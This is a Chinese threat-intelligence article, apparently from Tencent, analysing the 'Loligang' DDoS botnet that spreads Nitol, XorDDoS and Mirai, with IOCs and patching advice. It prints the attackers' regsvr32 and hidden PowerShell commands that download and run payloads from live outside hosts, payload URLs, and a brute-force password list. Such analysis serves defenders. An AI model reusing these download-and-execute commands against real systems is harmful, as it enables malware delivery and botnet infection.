freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    腾讯御见监测到“萝莉帮”跨平台僵尸网络,可发起DDoS攻击
    2019-07-04 09:21:06
    所属地 广东省

    背景

    近期腾讯安全御见威胁情报中心监测到一个名为“萝莉帮(Loligang)”的跨平台僵尸网络,可发起DDoS攻击。组成僵尸网络的电脑包括Windows服务器、Linux服务器以及大量IoT设备,木马类型包括Nitol、XorDDoS和Mirai。

    根据监测数据,受攻击的系统中有较高比例为Weblogic服务器,且攻击时执行的远程脚本中包含VM脚本(web服务端模板velocity环境执行),推测此次攻击中采用了各类Web漏洞利用。 

    Nitol木马入侵Windows系统后会通过IPC$弱口令爆破感染内网中的其他机器,然后连接控制端地址,接受控制指令进行DDoS攻击。感染Linux系统的XorDDoS会在/etc/init.d中创建副本,然后创建一个新的cron.sh脚本并将其添加到定时任务,最终目标为对其他机器发起DDoS攻击。Mirai病毒感染IoT设备,根据不同的CPU架构植入不同的二进制文件,然后对随机生成的IP地址进行探测攻击,接受指令对目标发起DDoS攻击。

    1.png

    “萝莉帮”僵尸网络的组建​ 

    详细分析

    黑客在HFS服务器http[:]/103.30.43.120:99、http[:]/222.186.52.155:21541

    上保存了大量的脚本及木马文件,包括命名后缀为png、vm、sh的脚本,windows平台运行的PE格式文件,Liunx平台运行的ELF格式文件

    2.png

    感染Windows系统

    入侵Windows系统后,首先通过以下命令执行远程代码2.png:

    regsvr32  /u /s /i:http://103.30.43.120:99/2.png scrobj.dll

    3.png


    接着2.png执行Powershell脚本下载Nitol木马ism.exe,保存为json.exe并启动:

    powershell.exe-WindowStyle Hidden $P = nEW-oBJECTsYSTEM.nET.wEBcLIENT;$P.DownloadFile('http[:]//222.186.52.155:21541/sh/ism.exe','C:\\ProgramData\\json.exe');START C:\\ProgramData\\json.exe;STARTC:\\ProgramData\\json.exe 

    ism.exe复制自身到windows目录下,重命名为6位随机名,并将自身安装为服务启动。安装的服务名为: “wdwa”,服务描述为:“Microsoft .NET COM+ Integration with SOAP”

    4.png

     

    创建新的副本,然后将原木马文件删除

    5.png


    释放加载资源文件

    6.png


    通过IPC$爆破横向传播

    7.png

     

    爆破使用内置的弱口令密码

    8.png

     

    完成IPC$共享感染后,病毒程序就会创建线程,连接C2服务器,接受并执行来自于C2服务器的指令。解密C2地址,密文为EhMQHRATHRcQHRIREwkLEwsTQw==,Nitol木马的显著标志为的解密算法:base64+凯撒移位+异或。

    9.png


    解密得到的C2地址为:103.30.43.120:8080

    10.png

     

    发送上线信息

    11.png

     

    下载执行程序

    12.png


    更新

    13.png


    使用iexplore.exe打开指定网页

    14.png


    执行DDoS攻击

    15.png

    感染Linux系统

    根据HFS服务器上的文件命名特征”weblogic.sh”,以及被攻击系统中存在大量的Weblogic服务器,推测黑客针对存在Weblogic漏洞的服务器进行批量扫描攻击。

    16.png


    攻击使用的.vm脚本为velocity支持的代码(velocity是基于java的web服务端模板引擎),利用该模板引擎的漏洞进行攻击后,执行远程代码cnm.vm,通过cnm.vm继续下载和执行Linux脚本9527.sh。

    (hxxp:// 222.186.52.155:21541/9527.sh)

    17.png


    Linux脚本9527.sh在感染机器植入ELF木马crosnice

    (hxxp:// 222.186.52.155:21541/crosnice)

    18.png


    crosnice为感染Linux平台的XorDDoS木马, XorDDoS这个名称源于木马在与C&C(命令和控制服务器)的网络通信中大量使用XOR加密。

    创建脚本/etc/cron.hourly/cron.sh,设置定时任务,每3分钟执行一次脚本。

    19.png


    写入脚本代码到/etc/init.d/%s/目录下

    20.png


    对其他机器发起DDoS攻击的代码

    21.png

    感染IoT设备

    该服务器上还发现保存有多个mirai病毒变种,每个变种对应一个特定的平台。Mirai感染受害者设备后,会释放一个shell脚本ssh.sh,shell脚本会下载和执行与当前架构相适应的可执行文件。包括针对以下CPU架构而构建的二进制文件:arm、arm5、arm6、arm7、mips、mpsl、ppc、sh4、spc、xb6、m68k

    22.png


    二进制程序在相应的平台运行后会创建一个随机IP地址列表,并针对具有弱凭据或已知漏洞的设备进行探测攻击,同时连接C2地址,接受指令执行DDoS攻击。

    23.png

    安全建议

    1.定期对服务器进行加固,尽早修复服务器相关组件安全漏洞,部分Weblogic漏洞修复建议如下: 

    CVE-2017-10271修复补丁地址:

    https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html 

    CVE-2019-2725补丁包下载地址如下:

    https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html?from=timeline 

    2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解,排查IOCs中的弱口令 

    3.针对IoT设备的安全建议:

    1)根据要求和安全策略修改IoT设备的默认隐私和安全设置。

    2)更改设备上的默认凭据。为设备帐户和Wi-Fi网络使用强大且唯一的密码。

    3)在设置Wi-Fi网络访问(WPA)时使用强加密方法。

    4)禁用不需要的功能和服务。

    5)禁用Telnet登录并尽可能使用SSH。 

    4.使用腾讯御点拦截可能的病毒攻击(https://s.tencent.com/product/yd/index.html

    24.png


    5.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html

    25.png

    IOCs

    IP

    122.10.82.239

    139.196.209.127

    103.30.43.120

    222.186.52.155

    122.10.82.239

     

    Domain

    xiaojiuddos.f3322.net

    6004.f3322.net

    xiao999.f3322.net

    download.nadns.info

    nadns.info

    ip.yototoo.com

     

    C&C

    139.196.209.127:2017

    103.30.43.120:8080

    103.30.43.120:99

    222.186.52.155:21541

     

    md5

    ad2fee695125aa611311fe0d940da476

    24abf520f8565b3867fb2c63778d59be

    6595022fb65c6e02c1ebc731ce52b147

    7a158bd42c896807431b798e70f6feb4
    d329eddf620c9f232bad8eb106020712
    975fe4000d8691b00c19fefae2041263
    058281e2cb0add01537fb2a2e70f4ffc
    17d704d023e8001f11b70cc3d1c1800a
    d1d4da603e2be3f131fa1030e9d0038e
    d34903535df5f704ad1fd25bd0d13f1c
    57655082c058a53f9962e81f7c13f9d7
    16e6ec559f3986faa22d89bfaca93a76
    62a6eee507bde271f9ec8115526da15a
    6a3ac93afcc8db933845bcac5f64347a
    29845bf22eb39dda90b8219f495fea14
    98d64c090183b72809d4aef0ed6359fd
    4eb3be468994ad865317fb68cc983dc6
    505e64fb3f1edbabc4374dbfc8f98063
    eecca0eb6255682a520814e991515d83
    f31daa9d4e9f5a24fc4dbe63ea717da6
    d96a091040c54a18cdc1686533338253
    414e0c8015865762933693b6eff5b8fd
    9dec0cdebc8d1e6f8378af24bd66e4f4
    a936182ca83f750e4845c5915800cb6b

     

    URL

    http[:]/103.30.43.120:99/1.png

    http[:]/103.30.43.120:99/ism.exe

    http[:]/103.30.43.120:99/loligang.arm

    http[:]/103.30.43.120:99/rsrr.vm

    http[:]/103.30.43.120:99/W4.7.exe

    http[:]/103.30.43.120:99/2.png

    http[:]/103.30.43.120:99/down.png

    http[:]/103.30.43.120:99/payload.exe

    http[:]/103.30.43.120:99/pos.vm

    http[:]/103.30.43.120:99/weblogic.sh

    http[:]/222.186.52.155:21541/arxc

    http[:]/222.186.52.155:21541/mixc

    http[:]/222.186.52.155:21541/loligang.arm

    http[:]/222.186.52.155:21541/loligang.arm5

    http[:]/222.186.52.155:21541/loligang.mips

    http[:]/222.186.52.155:21541/sh/1.sh

    http[:]/222.186.52.155:21541/sh/AV.sh

    http[:]/222.186.52.155:21541/sh/dcmini.sh

    http[:]/222.186.52.155:21541/sh/nice.sh

    http[:]/222.186.52.155:21541/sh/R.sh

     

    IPC$弱口令:

    Woaini
    Baby
    Asdf
    Angel
    Asdfgh
    1314520
    5201314
    Caonima
    88888
    Bbbbbb
    12345678
    Memory
    Abc123
    Qwerty
    123456
    111
    Password
    Enter
    Hack
    Xpuser
    Money
    Yeah
    Time

     

    参考链接:

    https://www.freebuf.com/column/153847.html

    https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html

    https://www.symantec.com/blogs/threat-intelligence/mirai-cross-platform-infection


    # 僵尸网络 # ddos攻击 # 腾讯御见威胁情报 # 萝莉帮 # loligang
    本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者